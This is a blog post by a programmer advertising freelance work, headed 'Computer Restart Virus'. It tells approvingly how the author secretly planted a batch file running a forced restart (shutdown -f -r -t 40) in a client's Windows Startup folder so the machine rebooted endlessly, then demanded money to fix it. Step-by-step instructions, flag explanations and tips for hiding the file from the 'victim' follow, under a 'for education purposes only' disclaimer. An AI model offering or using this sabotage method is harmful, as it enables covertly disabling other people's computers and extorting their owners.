Am Accepting programming jobs (VB6,VB.NET,JAVA,PHP,MYSQL,ANDROID APP etc) CAll/WHATSAPP +254720372593

COMPUTER RESTART VIRUS

Have you ever wondered how can make a file to restart the computer ? Today am going to show you how to make one .Actually this idea come as a result of a personal challenge!Yeah a challenge .I repaired somebody's computer after agreeing to pay me some cash . After doing the job the guy was not ready to honor our agreement. I decided to use my knowledge to get my money.

I had  to make his computer malfunction in a way that nobody else would know the cause of the problem except me . 
This what come into my brain.
What if i come up with a way to be restarting his computer automatically after a certain seconds such that this computer will be rendered useless
This was  the action plan .
  1. To make a .bat that will restart the computer
  2. 'Plant' this .bat file in the startup folder (this folder contains the programs that automatically executes when you start the computer)
  3. Each time the guy starts the machines the .bat would get executed .Meaning it would restart the computer again .
  4. The process would continue on and on again rendering this computer useless
  5. To solve the issue i would quickly browse to the startup folder (before the time specified in the .bat file elapses) and delete it .This would mean after the computer starts again the .bat file wont be executed and hence the computer will function normally.
WANT TO TRY THIS OUT ?
  • Open notepad and paste the following  code there..
@Echo off 
shutdown -f -r -t 40
  • Save the file as restart.bat in desired location or folder (you can give it any name as long as the extension remains .bat)
  • Copy the file saved above 
  • BROWSE TO:   C:\programdata\Microsoft\Windows\start Menu\Programs\Startup       (Location of startup folder will depend on your system)
  • PASTE THE FILE THERE (the file gets executed next time the computer is shutdown and or started).
ENJOY THE FRUITS OF YOUR KNOWLEDGE !

Back to my story:  I devised a way to get hold of his computer .As soon as the opportunity came by , I played  my cards. I 'planted' the file and went way waiting for hear from the 'big bro'.

You know what ? After the next day the guy was calling  me telling me the computer had developed certain  problem which his workmates cannot troubleshoot . He explained the behavior of the machine and I agreed to look at it late in the day. 

HURLEY,  he had to pay the amount he owed me first and pay for this one before i could sort out the matter.!

NBs 
  • This has been tested in Windows vista,Windows 7, Windows 8.
  • For easy access of the .bat file when deleting it , you can create its  shortcut on  the destop (I the victim is not keen on desktop items).
  • @Echo off  -->  Means that the .bat file wont prompt (wont give any message when carrying on its task).
  • shutdown -f -r -t 40 --> the -r means restart ,   -t 40 means it should restart the computer  after  40 seconds. 
AM NOT RESPONSIBLE FOR OUTCOME OR ANY DAMAGE AS RESULT  OF THIS TUTORIAL  . FOR EDUCATION PURPOSES ONLY.

2 comments: